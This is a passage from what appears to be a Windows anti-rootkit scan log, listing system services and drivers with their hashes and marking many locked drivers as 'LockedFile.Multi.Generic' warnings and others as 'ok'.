23:24:00.0062 0x18fc  Object is SCO, delete is not allowed
23:24:00.0062 0x18fc  NdisTapi ( LockedFile.Multi.Generic ) - warning
23:24:00.0092 0x18fc  [ F105BA1E22BF1F2EE8F005D4305E4BEC, 723DA09E13D0F50634D9F114590B837D16F7B36AA0DA2AB8F8C2D9991624EA8F ] Ndisuio         C:\Windows\system32\DRIVERS\ndisuio.sys
23:24:00.0092 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\ndisuio.sys. md5: F105BA1E22BF1F2EE8F005D4305E4BEC, sha256: 723DA09E13D0F50634D9F114590B837D16F7B36AA0DA2AB8F8C2D9991624EA8F
23:24:00.0092 0x18fc  Ndisuio - detected LockedFile.Multi.Generic ( 1 )
23:24:00.0092 0x18fc  Object is SCO, delete is not allowed
23:24:00.0092 0x18fc  Ndisuio ( LockedFile.Multi.Generic ) - warning
23:24:00.0122 0x18fc  [ 557DFAB9CA1FCB036AC77564C010DAD3, 8A21B342AFE5B498FB62EDDC81A3ADA9570677B7A382666090E0ABB1F85FEF29 ] NdisWan         C:\Windows\system32\DRIVERS\ndiswan.sys
23:24:00.0122 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\ndiswan.sys. md5: 557DFAB9CA1FCB036AC77564C010DAD3, sha256: 8A21B342AFE5B498FB62EDDC81A3ADA9570677B7A382666090E0ABB1F85FEF29
23:24:00.0122 0x18fc  NdisWan - detected LockedFile.Multi.Generic ( 1 )
23:24:00.0122 0x18fc  Object is SCO, delete is not allowed
23:24:00.0122 0x18fc  NdisWan ( LockedFile.Multi.Generic ) - warning
23:24:00.0122 0x18fc  Force sending object to P2P due to detect: NdisWan
23:24:00.0122 0x18fc  Object send P2P result: false
23:24:00.0172 0x18fc  [ 659B74FB74B86228D6338D643CD3E3CF, 83D741B7A2A204A661A80C226212749F514800060D05E217FA6DC14D62F38F80 ] NDProxy         C:\Windows\system32\drivers\NDProxy.sys
23:24:00.0172 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\NDProxy.sys. md5: 659B74FB74B86228D6338D643CD3E3CF, sha256: 83D741B7A2A204A661A80C226212749F514800060D05E217FA6DC14D62F38F80
23:24:00.0172 0x18fc  NDProxy - detected LockedFile.Multi.Generic ( 1 )
23:24:00.0172 0x18fc  Object is SCO, delete is not allowed
23:24:00.0172 0x18fc  NDProxy ( LockedFile.Multi.Generic ) - warning
23:24:00.0182 0x18fc  [ 86743D9F5D2B1048062B14B1D84501C4, DBF6D6A60AB774FCB0F464FF2D285A7521D0A24006687B243AB46B17D8032062 ] NetBIOS         C:\Windows\system32\DRIVERS\netbios.sys
23:24:00.0182 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\netbios.sys. md5: 86743D9F5D2B1048062B14B1D84501C4, sha256: DBF6D6A60AB774FCB0F464FF2D285A7521D0A24006687B243AB46B17D8032062
23:24:00.0182 0x18fc  NetBIOS - detected LockedFile.Multi.Generic ( 1 )
23:24:00.0192 0x18fc  Object is SCO, delete is not allowed
23:24:00.0192 0x18fc  NetBIOS ( LockedFile.Multi.Generic ) - warning
23:24:00.0264 0x18fc  [ 9162B273A44AB9DCE5B44362731D062A, 5A1BA6DBFEBB2618DC9D4CC55FA071C170A5D22FFB24CE62DD5B3210D8B45F39 ] NetBT           C:\Windows\system32\DRIVERS\netbt.sys
23:24:00.0264 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\netbt.sys. md5: 9162B273A44AB9DCE5B44362731D062A, sha256: 5A1BA6DBFEBB2618DC9D4CC55FA071C170A5D22FFB24CE62DD5B3210D8B45F39
23:24:00.0264 0x18fc  NetBT - detected LockedFile.Multi.Generic ( 1 )
23:24:00.0264 0x18fc  Object is SCO, delete is not allowed
23:24:00.0264 0x18fc  NetBT ( LockedFile.Multi.Generic ) - warning
23:24:00.0264 0x18fc  Force sending object to P2P due to detect: NetBT
23:24:00.0264 0x18fc  Object send P2P result: false
23:24:00.0314 0x18fc  [ 0793F40B9B8A1BDD266296409DBD91EA, 8A383FC9A66A327905C340D06138980F9E489479535A2C2AAE5E8BB14A74826E ] Netlogon        C:\Windows\system32\lsass.exe
23:24:00.0324 0x18fc  Netlogon - ok
23:24:00.0386 0x18fc  [ 847D3AE376C0817161A14A82C8922A9E, 37AE692B3481323134125EF58F2C3CBC20177371AF2F5874F53DD32A827CB936 ] Netman          C:\Windows\System32\netman.dll
23:24:00.0456 0x18fc  Netman - ok
23:24:00.0572 0x18fc  [ 9A7D3A1AA5C830744FF6C44BB55A347A, 42D3281893DB4C0DDA6A7BDA92D3CCE23968D0E3CF880777B8DBBFD955629B08 ] NetMsmqActivator C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
23:24:00.0700 0x18fc  NetMsmqActivator - ok
23:24:00.0700 0x18fc  [ 9A7D3A1AA5C830744FF6C44BB55A347A, 42D3281893DB4C0DDA6A7BDA92D3CCE23968D0E3CF880777B8DBBFD955629B08 ] NetPipeActivator C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
23:24:00.0710 0x18fc  NetPipeActivator - ok
23:24:00.0800 0x18fc  [ 5F28111C648F1E24F7DBC87CDEB091B8, 2E8645285921EDB98BB2173E11E57459C888D52E80D85791D169C869DE8813B9 ] netprofm        C:\Windows\System32\netprofm.dll
23:24:00.0860 0x18fc  netprofm - ok
23:24:00.0870 0x18fc  [ 9A7D3A1AA5C830744FF6C44BB55A347A, 42D3281893DB4C0DDA6A7BDA92D3CCE23968D0E3CF880777B8DBBFD955629B08 ] NetTcpActivator C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
23:24:00.0880 0x18fc  NetTcpActivator - ok
23:24:00.0880 0x18fc  [ 9A7D3A1AA5C830744FF6C44BB55A347A, 42D3281893DB4C0DDA6A7BDA92D3CCE23968D0E3CF880777B8DBBFD955629B08 ] NetTcpPortSharing C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
23:24:00.0890 0x18fc  NetTcpPortSharing - ok
23:24:00.0960 0x18fc  [ 77889813BE4D166CDAB78DDBA990DA92, 2EF531AE502B943632EEC66A309A8BFCDD36120A5E1473F4AAF3C2393AD0E6A3 ] nfrd960         C:\Windows\system32\DRIVERS\nfrd960.sys
23:24:00.0960 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\nfrd960.sys. md5: 77889813BE4D166CDAB78DDBA990DA92, sha256: 2EF531AE502B943632EEC66A309A8BFCDD36120A5E1473F4AAF3C2393AD0E6A3
23:24:00.0960 0x18fc  nfrd960 - detected LockedFile.Multi.Generic ( 1 )
23:24:00.0960 0x18fc  Object is SCO, delete is not allowed
23:24:00.0960 0x18fc  nfrd960 ( LockedFile.Multi.Generic ) - warning
23:24:00.0960 0x18fc  Force sending object to P2P due to detect: nfrd960
23:24:00.0960 0x18fc  Object send P2P result: false
23:24:01.0050 0x18fc  [ D9A0CE66046D6EFA0C61BAA885CBA0A8, 06C3331C7F3EE0E0B95E8302CB80315E965587C4D6231785B8ACF3FAE4731FAF ] NlaSvc          C:\Windows\System32\nlasvc.dll
23:24:01.0160 0x18fc  NlaSvc - ok
23:24:01.0200 0x18fc  [ 1E4C4AB5C9B8DD13179BBDC75A2A01F7, D8957EF7060A69DBB3CD6B2C45B1E4143592AB8D018471E17AC04668157DC67F ] Npfs            C:\Windows\system32\drivers\Npfs.sys
23:24:01.0200 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\Npfs.sys. md5: 1E4C4AB5C9B8DD13179BBDC75A2A01F7, sha256: D8957EF7060A69DBB3CD6B2C45B1E4143592AB8D018471E17AC04668157DC67F
23:24:01.0200 0x18fc  Npfs - detected LockedFile.Multi.Generic ( 1 )
23:24:01.0200 0x18fc  Object is SCO, delete is not allowed
23:24:01.0200 0x18fc  Npfs ( LockedFile.Multi.Generic ) - warning
23:24:01.0200 0x18fc  Force sending object to P2P due to detect: Npfs
23:24:01.0220 0x18fc  Object send P2P result: false
23:24:01.0280 0x18fc  [ D54BFDF3E0C953F823B3D0BFE4732528, 497A1DCC5646EC22119273216DF10D5442D16F83E4363770F507518CF6EAA53A ] nsi             C:\Windows\system32\nsisvc.dll
23:24:01.0340 0x18fc  nsi - ok
23:24:01.0350 0x18fc  [ E7F5AE18AF4168178A642A9247C63001, 133023B7E4BA8049C4CAED3282BDD25571D1CC25FAC3B820C7F981D292689D76 ] nsiproxy        C:\Windows\system32\drivers\nsiproxy.sys
23:24:01.0350 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\nsiproxy.sys. md5: E7F5AE18AF4168178A642A9247C63001, sha256: 133023B7E4BA8049C4CAED3282BDD25571D1CC25FAC3B820C7F981D292689D76
23:24:01.0350 0x18fc  nsiproxy - detected LockedFile.Multi.Generic ( 1 )
23:24:01.0350 0x18fc  Object is SCO, delete is not allowed
23:24:01.0350 0x18fc  nsiproxy ( LockedFile.Multi.Generic ) - warning
23:24:01.0540 0x18fc  [ 356698A13C4630D5B31C37378D469196, BF5704AADE5C3DA370501747F12ED6E9C3349E342CCF89005AAE132B570BB42B ] Ntfs            C:\Windows\system32\drivers\Ntfs.sys
23:24:01.0540 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\Ntfs.sys. md5: 356698A13C4630D5B31C37378D469196, sha256: BF5704AADE5C3DA370501747F12ED6E9C3349E342CCF89005AAE132B570BB42B
23:24:01.0540 0x18fc  Ntfs - detected LockedFile.Multi.Generic ( 1 )
23:24:01.0540 0x18fc  Object is SCO, delete is not allowed
23:24:01.0540 0x18fc  Ntfs ( LockedFile.Multi.Generic ) - warning
23:24:01.0540 0x18fc  Force sending object to P2P due to detect: Ntfs
23:24:01.0550 0x18fc  Object send P2P result: false
23:24:01.0560 0x18fc  [ 9899284589F75FA8724FF3D16AED75C1, 181188599FD5D4DE33B97010D9E0CAEABAB9A3EF50712FE7F9AA0735CD0666D6 ] Null            C:\Windows\system32\drivers\Null.sys
23:24:01.0560 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\Null.sys. md5: 9899284589F75FA8724FF3D16AED75C1, sha256: 181188599FD5D4DE33B97010D9E0CAEABAB9A3EF50712FE7F9AA0735CD0666D6
23:24:01.0570 0x18fc  Null - detected LockedFile.Multi.Generic ( 1 )
23:24:01.0570 0x18fc  Object is SCO, delete is not allowed
23:24:01.0570 0x18fc  Null ( LockedFile.Multi.Generic ) - warning
23:24:01.0570 0x18fc  Force sending object to P2P due to detect: Null
23:24:01.0570 0x18fc  Object send P2P result: false
23:24:01.0602 0x18fc  [ 3E38712941E9BB4DDBEE00AFFE3FED3D, 03F27CC0EF0A86D0B2DAAB6F72838CB2AB57FE5D40074828D5B7F118CD5CBEE7 ] nvraid          C:\Windows\system32\DRIVERS\nvraid.sys
23:24:01.0603 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\nvraid.sys. md5: 3E38712941E9BB4DDBEE00AFFE3FED3D, sha256: 03F27CC0EF0A86D0B2DAAB6F72838CB2AB57FE5D40074828D5B7F118CD5CBEE7
23:24:01.0603 0x18fc  nvraid - detected LockedFile.Multi.Generic ( 1 )
23:24:01.0604 0x18fc  Object is SCO, delete is not allowed
23:24:01.0604 0x18fc  nvraid ( LockedFile.Multi.Generic ) - warning
23:24:01.0672 0x18fc  [ 477DC4D6DEB99BE37084C9AC6D013DA1, E58C4D621CAAB1C68FB4A056576F48BC87913A5EBF0B511EFFB8F38C7D3E516E ] nvstor          C:\Windows\system32\DRIVERS\nvstor.sys
23:24:01.0672 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\nvstor.sys. md5: 477DC4D6DEB99BE37084C9AC6D013DA1, sha256: E58C4D621CAAB1C68FB4A056576F48BC87913A5EBF0B511EFFB8F38C7D3E516E
23:24:01.0672 0x18fc  nvstor - detected LockedFile.Multi.Generic ( 1 )
23:24:01.0672 0x18fc  Object is SCO, delete is not allowed
23:24:01.0672 0x18fc  nvstor ( LockedFile.Multi.Generic ) - warning
23:24:01.0672 0x18fc  Force sending object to P2P due to detect: nvstor
23:24:01.0672 0x18fc  Object send P2P result: false
23:24:01.0732 0x18fc  [ 270D7CD42D6E3979F6DD0146650F0E05, 752489E54C9004EDCBE1F1F208FFD864DA5C83E59A2DDE6B3E0D63ECA996F76F ] nv_agp          C:\Windows\system32\DRIVERS\nv_agp.sys
23:24:01.0732 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\nv_agp.sys. md5: 270D7CD42D6E3979F6DD0146650F0E05, sha256: 752489E54C9004EDCBE1F1F208FFD864DA5C83E59A2DDE6B3E0D63ECA996F76F
23:24:01.0732 0x18fc  nv_agp - detected LockedFile.Multi.Generic ( 1 )
23:24:01.0732 0x18fc  Object is SCO, delete is not allowed
23:24:01.0732 0x18fc  nv_agp ( LockedFile.Multi.Generic ) - warning
23:24:01.0732 0x18fc  Force sending object to P2P due to detect: nv_agp
23:24:01.0732 0x18fc  Object send P2P result: false
23:24:01.0762 0x18fc  [ 3589478E4B22CE21B41FA1BFC0B8B8A0, AD2469FC753FE552CB809FF405A9AB23E7561292FE89117E3B3B62057EFF0203 ] ohci1394        C:\Windows\system32\DRIVERS\ohci1394.sys
23:24:01.0762 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\ohci1394.sys. md5: 3589478E4B22CE21B41FA1BFC0B8B8A0, sha256: AD2469FC753FE552CB809FF405A9AB23E7561292FE89117E3B3B62057EFF0203
23:24:01.0762 0x18fc  ohci1394 - detected LockedFile.Multi.Generic ( 1 )
23:24:01.0762 0x18fc  Object is SCO, delete is not allowed
23:24:01.0762 0x18fc  ohci1394 ( LockedFile.Multi.Generic ) - warning
23:24:01.0762 0x18fc  Force sending object to P2P due to detect: ohci1394
23:24:01.0762 0x18fc  Object send P2P result: false
23:24:01.0932 0x18fc  [ 9D10F99A6712E28F8ACD5641E3A7EA6B, 70964A0ED9011EA94044E15FA77EDD9CF535CC79ED8E03A3721FF007E69595CC ] ose             C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE
23:24:01.0942 0x18fc  ose - ok
23:24:02.0459 0x18fc  [ 61BFFB5F57AD12F83AB64B7181829B34, 1DD0DD35E4158F95765EE6639F217DF03A0A19E624E020DBA609268C08A13846 ] osppsvc         C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
23:24:02.0634 0x18fc  osppsvc - ok
23:24:02.0724 0x18fc  [ 3EAC4455472CC2C97107B5291E0DCAFE, E51F373F2DBEAEE516B42BAE8C1B5BB68D00B881323E842CB6EDEC0A183CFFC3 ] p2pimsvc        C:\Windows\system32\pnrpsvc.dll
23:24:02.0774 0x18fc  p2pimsvc - ok
23:24:02.0864 0x18fc  [ 927463ECB02179F88E4B9A17568C63C3, FEFD3447692C277D59EEC7BF218552C8BB6B8C98C26E973675549628408B94CE ] p2psvc          C:\Windows\system32\p2psvc.dll
23:24:03.0064 0x18fc  p2psvc - ok
23:24:03.0116 0x18fc  [ 0086431C29C35BE1DBC43F52CC273887, 0D116D49EF9ABB57DA005764F25E692622210627FC2048F06A989B12FA8D0A80 ] Parport         C:\Windows\system32\DRIVERS\parport.sys
23:24:03.0116 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\parport.sys. md5: 0086431C29C35BE1DBC43F52CC273887, sha256: 0D116D49EF9ABB57DA005764F25E692622210627FC2048F06A989B12FA8D0A80
23:24:03.0116 0x18fc  Parport - detected LockedFile.Multi.Generic ( 1 )
23:24:03.0116 0x18fc  Object is SCO, delete is not allowed
23:24:03.0116 0x18fc  Parport ( LockedFile.Multi.Generic ) - warning
23:24:03.0156 0x18fc  [ 7DAA117143316C4A1537E074A5A9EAF0, D4F31F67BE09B6904C1B9702DC042BC0DAB628055B956C79FF760A9027679E6B ] partmgr         C:\Windows\system32\drivers\partmgr.sys
23:24:03.0156 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\partmgr.sys. md5: 7DAA117143316C4A1537E074A5A9EAF0, sha256: D4F31F67BE09B6904C1B9702DC042BC0DAB628055B956C79FF760A9027679E6B
23:24:03.0156 0x18fc  partmgr - detected LockedFile.Multi.Generic ( 1 )
23:24:03.0156 0x18fc  Object is SCO, delete is not allowed
23:24:03.0156 0x18fc  partmgr ( LockedFile.Multi.Generic ) - warning
23:24:03.0156 0x18fc  Force sending object to P2P due to detect: partmgr
23:24:03.0156 0x18fc  Object send P2P result: false
23:24:03.0226 0x18fc  [ 3AEAA8B561E63452C655DC0584922257, 04C072969B58657602EB0C21CEDF24FCEE14E61B90A0F758F93925EF2C9FC32D ] PcaSvc          C:\Windows\System32\pcasvc.dll
23:24:03.0266 0x18fc  PcaSvc - ok
23:24:03.0326 0x18fc  [ F36F6504009F2FB0DFD1B17A116AD74B, 33A4C217F7DC5E5B7E1B6CF335327C8FE6CC5D6D048D420252965574CAD83918 ] pci             C:\Windows\system32\DRIVERS\pci.sys
23:24:03.0326 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\pci.sys. md5: F36F6504009F2FB0DFD1B17A116AD74B, sha256: 33A4C217F7DC5E5B7E1B6CF335327C8FE6CC5D6D048D420252965574CAD83918
23:24:03.0336 0x18fc  pci - detected LockedFile.Multi.Generic ( 1 )
23:24:03.0336 0x18fc  Object is SCO, delete is not allowed
23:24:03.0336 0x18fc  pci ( LockedFile.Multi.Generic ) - warning
23:24:03.0356 0x18fc  [ B5B8B5EF2E5CB34DF8DCF8831E3534FA, F2A7CC645B96946CC65BF60E14E70DC09C848D27C7943CE5DEA0C01A6B863480 ] pciide          C:\Windows\system32\DRIVERS\pciide.sys
23:24:03.0356 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\pciide.sys. md5: B5B8B5EF2E5CB34DF8DCF8831E3534FA, sha256: F2A7CC645B96946CC65BF60E14E70DC09C848D27C7943CE5DEA0C01A6B863480
23:24:03.0356 0x18fc  pciide - detected LockedFile.Multi.Generic ( 1 )
23:24:03.0356 0x18fc  Object is SCO, delete is not allowed
23:24:03.0356 0x18fc  pciide ( LockedFile.Multi.Generic ) - warning
23:24:03.0356 0x18fc  Force sending object to P2P due to detect: pciide
23:24:03.0356 0x18fc  Object send P2P result: false
23:24:03.0404 0x18fc  [ B2E81D4E87CE48589F98CB8C05B01F2F, 6763BEE7270A4873B3E131BFB92313E2750FCBD0AD73C23D1C4F98F7DF73DE14 ] pcmcia          C:\Windows\system32\DRIVERS\pcmcia.sys
23:24:03.0404 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\pcmcia.sys. md5: B2E81D4E87CE48589F98CB8C05B01F2F, sha256: 6763BEE7270A4873B3E131BFB92313E2750FCBD0AD73C23D1C4F98F7DF73DE14
23:24:03.0405 0x18fc  pcmcia - detected LockedFile.Multi.Generic ( 1 )
23:24:03.0405 0x18fc  Object is SCO, delete is not allowed
23:24:03.0405 0x18fc  pcmcia ( LockedFile.Multi.Generic ) - warning
23:24:03.0417 0x18fc  [ D6B9C2E1A11A3A4B26A182FFEF18F603, BBA5FE08B1DDD6243118E11358FD61B10E850F090F061711C3CB207CE5FBBD36 ] pcw             C:\Windows\system32\drivers\pcw.sys
23:24:03.0418 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\pcw.sys. md5: D6B9C2E1A11A3A4B26A182FFEF18F603, sha256: BBA5FE08B1DDD6243118E11358FD61B10E850F090F061711C3CB207CE5FBBD36
23:24:03.0418 0x18fc  pcw - detected LockedFile.Multi.Generic ( 1 )
23:24:03.0418 0x18fc  pcw ( LockedFile.Multi.Generic ) - warning
23:24:03.0418 0x18fc  Force sending object to P2P due to detect: pcw
23:24:03.0419 0x18fc  Object send P2P result: false
23:24:03.0478 0x18fc  [ 68769C3356B3BE5D1C732C97B9A80D6E, FB2D61145980A2899D1B7729184C54070315B0E63C9A22400A76CCD39E00029C ] PEAUTH          C:\Windows\system32\drivers\peauth.sys
23:24:03.0478 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\peauth.sys. md5: 68769C3356B3BE5D1C732C97B9A80D6E, sha256: FB2D61145980A2899D1B7729184C54070315B0E63C9A22400A76CCD39E00029C
23:24:03.0478 0x18fc  PEAUTH - detected LockedFile.Multi.Generic ( 1 )
23:24:03.0478 0x18fc  Object is SCO, delete is not allowed
23:24:03.0478 0x18fc  PEAUTH ( LockedFile.Multi.Generic ) - warning
23:24:03.0478 0x18fc  Force sending object to P2P due to detect: PEAUTH
23:24:03.0478 0x18fc  Object send P2P result: false
23:24:05.0150 0x18fc  [ E495E408C93141E8FC72DC0C6046DDFA, 489B957DADA0DC128A09468F1AD082DCC657E86053208EA06A12937BE86FB919 ] PerfHost        C:\Windows\SysWow64\perfhost.exe
23:24:05.0190 0x18fc  PerfHost - ok
23:24:05.0470 0x18fc  [ 557E9A86F65F0DE18C9B6751DFE9D3F1, 630EE5A80335929517A22D130C75CBCE882B92978372A6F36C30B9D353C7BB07 ] pla             C:\Windows\system32\pla.dll
23:24:05.0590 0x18fc  pla - ok
23:24:05.0870 0x18fc  [ 79B2E811F5BCFED95AC44752CDC69C16, 2044E44C62E3AE210ED01E89574E95B96DFD535AF1752EAF963D815E1B1E2E20 ] PlaysService    C:\Program Files (x86)\Raptr Inc\PlaysTV\plays_service.exe
23:24:05.0880 0x18fc  PlaysService - ok
23:24:05.0980 0x18fc  [ 23157D583244400E1D7FBAEE2E4B31B7, 4E8D93F746C727CE1A89B53FEFFCFB080AC3CC8F3CF2F8613E692E989794C52F ] PlugPlay        C:\Windows\system32\umpnpmgr.dll
23:24:06.0050 0x18fc  PlugPlay - ok
23:24:06.0080 0x18fc  PnkBstrA - ok
23:24:06.0100 0x18fc  [ 7195581CEC9BB7D12ABE54036ACC2E38, 9C4E5D6EA984148F2663DC529083408B2248DFF6DAAC85D9195F80A722782315 ] PNRPAutoReg     C:\Windows\system32\pnrpauto.dll
23:24:06.0130 0x18fc  PNRPAutoReg - ok
23:24:06.0200 0x18fc  [ 3EAC4455472CC2C97107B5291E0DCAFE, E51F373F2DBEAEE516B42BAE8C1B5BB68D00B881323E842CB6EDEC0A183CFFC3 ] PNRPsvc         C:\Windows\system32\pnrpsvc.dll
23:24:06.0220 0x18fc  PNRPsvc - ok
23:24:06.0300 0x18fc  [ 166EB40D1F5B47E615DE3D0FFFE5F243, E32BCCA0D25CD631C221986EBE9F6C54BF2F12DE1672D69CCC4E22AD07D0525A ] PolicyAgent     C:\Windows\System32\ipsecsvc.dll
23:24:06.0390 0x18fc  PolicyAgent - ok
23:24:06.0430 0x18fc  [ 6BA9D927DDED70BD1A9CADED45F8B184, 66203CE70A5EDE053929A940F38924C6792239CCCE10DD2C1D90D5B4D6748B55 ] Power           C:\Windows\system32\umpo.dll
23:24:06.0580 0x18fc  Power - ok
23:24:06.0610 0x18fc  [ 27CC19E81BA5E3403C48302127BDA717, C580FC552DDF9C163FC325B38B05C06FFD696495E4C01514BCD6346CFE4F0B40 ] PptpMiniport    C:\Windows\system32\DRIVERS\raspptp.sys
23:24:06.0610 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\raspptp.sys. md5: 27CC19E81BA5E3403C48302127BDA717, sha256: C580FC552DDF9C163FC325B38B05C06FFD696495E4C01514BCD6346CFE4F0B40
23:24:06.0610 0x18fc  PptpMiniport - detected LockedFile.Multi.Generic ( 1 )
23:24:06.0610 0x18fc  Object is SCO, delete is not allowed
23:24:06.0610 0x18fc  PptpMiniport ( LockedFile.Multi.Generic ) - warning
23:24:06.0640 0x18fc  [ 0D922E23C041EFB1C3FAC2A6F943C9BF, 855418A6A58DCAFB181A1A68613B3E203AFB0A9B3D9D26D0C521F9F613B4EAD5 ] Processor       C:\Windows\system32\DRIVERS\processr.sys
23:24:06.0640 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\processr.sys. md5: 0D922E23C041EFB1C3FAC2A6F943C9BF, sha256: 855418A6A58DCAFB181A1A68613B3E203AFB0A9B3D9D26D0C521F9F613B4EAD5
23:24:06.0640 0x18fc  Processor - detected LockedFile.Multi.Generic ( 1 )
23:24:06.0640 0x18fc  Object is SCO, delete is not allowed
23:24:06.0640 0x18fc  Processor ( LockedFile.Multi.Generic ) - warning
23:24:06.0690 0x18fc  [ F381975E1F4346DE875CB07339CE8D3A, 867BFC2E9A08E026289794019B8DE651A8604D06DD6A9BF166C29AFC24B6D26E ] ProfSvc         C:\Windows\system32\profsvc.dll
23:24:06.0790 0x18fc  ProfSvc - ok
23:24:06.0860 0x18fc  [ 0793F40B9B8A1BDD266296409DBD91EA, 8A383FC9A66A327905C340D06138980F9E489479535A2C2AAE5E8BB14A74826E ] ProtectedStorage C:\Windows\system32\lsass.exe
23:24:06.0880 0x18fc  ProtectedStorage - ok
23:24:06.0950 0x18fc  [ EE992183BD8EAEFD9973F352E587A299, 6B28930FAA0A54FAADDAF2231553D7F5D45C7227454C6D49A86DFC9EF6BC9043 ] Psched          C:\Windows\system32\DRIVERS\pacer.sys
23:24:06.0950 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\pacer.sys. md5: EE992183BD8EAEFD9973F352E587A299, sha256: 6B28930FAA0A54FAADDAF2231553D7F5D45C7227454C6D49A86DFC9EF6BC9043
23:24:06.0950 0x18fc  Psched - detected LockedFile.Multi.Generic ( 1 )
23:24:06.0950 0x18fc  Object is SCO, delete is not allowed
23:24:06.0950 0x18fc  Psched ( LockedFile.Multi.Generic ) - warning
23:24:06.0950 0x18fc  Force sending object to P2P due to detect: Psched
23:24:06.0950 0x18fc  Object send P2P result: false
23:24:07.0120 0x18fc  [ A53A15A11EBFD21077463EE2C7AFEEF0, 6002B012A75045DEA62640A864A8721EADE2F8B65BEB5F5BA76D8CD819774489 ] ql2300          C:\Windows\system32\DRIVERS\ql2300.sys
23:24:07.0120 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\ql2300.sys. md5: A53A15A11EBFD21077463EE2C7AFEEF0, sha256: 6002B012A75045DEA62640A864A8721EADE2F8B65BEB5F5BA76D8CD819774489
23:24:07.0130 0x18fc  ql2300 - detected LockedFile.Multi.Generic ( 1 )
23:24:07.0130 0x18fc  Object is SCO, delete is not allowed
23:24:07.0130 0x18fc  ql2300 ( LockedFile.Multi.Generic ) - warning
23:24:07.0160 0x18fc  [ 4F6D12B51DE1AAEFF7DC58C4D75423C8, FB6ABAB741CED66A79E31A45111649F2FA3E26CEE77209B5296F789F6F7D08DE ] ql40xx          C:\Windows\system32\DRIVERS\ql40xx.sys
23:24:07.0160 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\ql40xx.sys. md5: 4F6D12B51DE1AAEFF7DC58C4D75423C8, sha256: FB6ABAB741CED66A79E31A45111649F2FA3E26CEE77209B5296F789F6F7D08DE
23:24:07.0160 0x18fc  ql40xx - detected LockedFile.Multi.Generic ( 1 )
23:24:07.0160 0x18fc  Object is SCO, delete is not allowed
23:24:07.0160 0x18fc  ql40xx ( LockedFile.Multi.Generic ) - warning
23:24:07.0180 0x18fc  [ 906191634E99AEA92C4816150BDA3732, A0305436384104C3B559F9C73902DA19B96B518413379E397C5CDAB0B2B9418F ] QWAVE           C:\Windows\system32\qwave.dll
23:24:07.0200 0x18fc  QWAVE - ok
23:24:07.0220 0x18fc  [ 76707BB36430888D9CE9D705398ADB6C, 35C1D1D05F98AC29A33D3781F497A0B40A3CB9CDF25FE1F28F574E40DDF70535 ] QWAVEdrv        C:\Windows\system32\drivers\qwavedrv.sys
23:24:07.0220 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\qwavedrv.sys. md5: 76707BB36430888D9CE9D705398ADB6C, sha256: 35C1D1D05F98AC29A33D3781F497A0B40A3CB9CDF25FE1F28F574E40DDF70535
23:24:07.0220 0x18fc  QWAVEdrv - detected LockedFile.Multi.Generic ( 1 )
23:24:07.0220 0x18fc  Object is SCO, delete is not allowed
23:24:07.0220 0x18fc  QWAVEdrv ( LockedFile.Multi.Generic ) - warning
23:24:07.0260 0x18fc  [ 5A0DA8AD5762FA2D91678A8A01311704, 8A64EB5DBAB7048A9E42A21CEB62CCD5B007A80C199892D7F8C69B48E8A255EF ] RasAcd          C:\Windows\system32\DRIVERS\rasacd.sys
23:24:07.0260 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\rasacd.sys. md5: 5A0DA8AD5762FA2D91678A8A01311704, sha256: 8A64EB5DBAB7048A9E42A21CEB62CCD5B007A80C199892D7F8C69B48E8A255EF
23:24:07.0260 0x18fc  RasAcd - detected LockedFile.Multi.Generic ( 1 )
23:24:07.0260 0x18fc  Object is SCO, delete is not allowed
23:24:07.0260 0x18fc  RasAcd ( LockedFile.Multi.Generic ) - warning
23:24:07.0310 0x18fc  [ 7ECFF9B22276B73F43A99A15A6094E90, 62C70DA127F48F796F8897BBFA23AB6EB080CC923F0F091DFA384A93F5C90CA1 ] RasAgileVpn     C:\Windows\system32\DRIVERS\AgileVpn.sys
23:24:07.0310 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\AgileVpn.sys. md5: 7ECFF9B22276B73F43A99A15A6094E90, sha256: 62C70DA127F48F796F8897BBFA23AB6EB080CC923F0F091DFA384A93F5C90CA1
23:24:07.0310 0x18fc  RasAgileVpn - detected LockedFile.Multi.Generic ( 1 )
23:24:07.0310 0x18fc  RasAgileVpn ( LockedFile.Multi.Generic ) - warning
